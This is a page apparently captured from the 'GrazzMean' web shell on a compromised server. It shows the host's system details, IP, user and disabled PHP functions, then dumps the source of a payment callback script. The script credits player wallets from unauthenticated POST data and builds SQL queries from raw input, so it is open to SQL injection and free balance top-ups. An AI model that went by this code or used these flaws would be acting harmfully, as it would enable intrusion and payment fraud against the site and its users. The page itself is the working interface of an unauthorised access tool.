shell bypass 403

GrazzMean Shell

: /home/gutlooks/www/payu/ [ drwxr-xr-x ]
Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : ad_m.php
<?php
//function autoload
    // function __autoload($class)
    //     {
    //       include("../zebra_cross/admin_login/classess/".$class.".php");
    //     }
        
        spl_autoload_register(function($class) {
  include("../zebra_cross/admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
            
            date_default_timezone_set('Asia/Kolkata');
            if(isset($_POST['name']) && isset($_POST['mobile']) && isset($_POST['amount'])  && isset($_POST['transaction_id']))
                {
                    
                    $name = $_POST['name'];
                    $mobile = $_POST['mobile'];
                    $amount = $_POST['amount'];
                    $transaction_id = $_POST['transaction_id'];
                   
                    
                    $check_message = $sqlfun->query("select payment_preference,bonus_minimum_amnt,bonus_setting,bonus_percentage,intent_setting from message");
                    $row_message = $check_message->fetch(PDO::FETCH_OBJ);
                    $bonus_setting = $row_message->bonus_setting;
                    $bonus_percentage = $row_message->bonus_percentage;
                    $intent_setting = $row_message->intent_setting;
                    $bonus_minimum_amnt = $row_message->bonus_minimum_amnt;
                    $payment_preference = $row_message->payment_preference;
                    
                    $p_id = $_POST['p_id'];
                     if($intent_setting == "automatic")
                                    {
                                         $datas = array(
                                            "date" =>date("Y-m-d"),
                                            "player_id" =>$p_id,
                                            "p_name" =>$name,
                                            "p_mobile" =>$mobile,
                                            "amount" =>$amount,
                                            "time" =>date("H:i:s"),
                                            "transaction_id" =>$transaction_id,
                                            "status" =>"Approved",
                                           
                                            );
                                            
                                             
                                            
                                            if($bonus_minimum_amnt <= $amount){
                                                if($bonus_setting == "yes"){
                                                    $bonus_amount = ceil($amount * $bonus_percentage/100);
                                                    $datas['bonus'] = $bonus_amount;
                                                    
                                                }
                                            }
                                            
                                            
                                            
                                            if($sqlfun->ins_data("add_money_request",$datas))
                                                {
                                                    $add_last_id = $sqlfun->last_id();
                                                    //fetch wallet
                                                    $checkk_player = $sqlfun->query("select * from player where p_id = '$p_id'");
                                                    $roww_player = $checkk_player->fetch(PDO::FETCH_OBJ);
                                                    $wallet= $roww_player->wallet;
                                                      if($bonus_setting == "yes"){
                                                            $final_wallet = $bonus_amount + $amount + $wallet; 
                                                      }
                                                      else
                                                      {
                                                          $final_wallet = $amount + $wallet;
                                                      }
                                                    //
                                                    
                                                    $cnd_p_up = $checkk_player = $sqlfun->query("update player set wallet = '$final_wallet' where p_id = '$p_id'");
                                                    
                                                    $wallet_data = array(
                                                            "date" =>date("Y-m-d"),
                                                            "row_id"=>$add_last_id,
                                                            "type"=>"Recharge",
                                                            "user_id"=>$p_id,
                                                            "amount"=>$amount,
                                                            "left_balance"=>$final_wallet,
                                                        );
                                                        
                                                          if($bonus_setting == "yes"){
                                                             $wallet_data['bonus'] = $bonus_amount; 
                                                          }
                                                    $sqlfun->ins_data("wallet_history",$wallet_data);
                                                    
                                                    $data = array("res"=>"success","msg" =>"request has been submitted successfully"); 
                                                }
                                                else
                                                {
                                                    $data = array("res"=>"failure","msg" =>"Something went wrong"); 
                                                }    
                                    }
                                                
                        
                            
                            
                }else{
                    
                            $data = array("res"=>"failure","msg" =>"Invalid credentials 1");
                }
                echo json_encode($data);
        ?>
© 2026 GrazzMean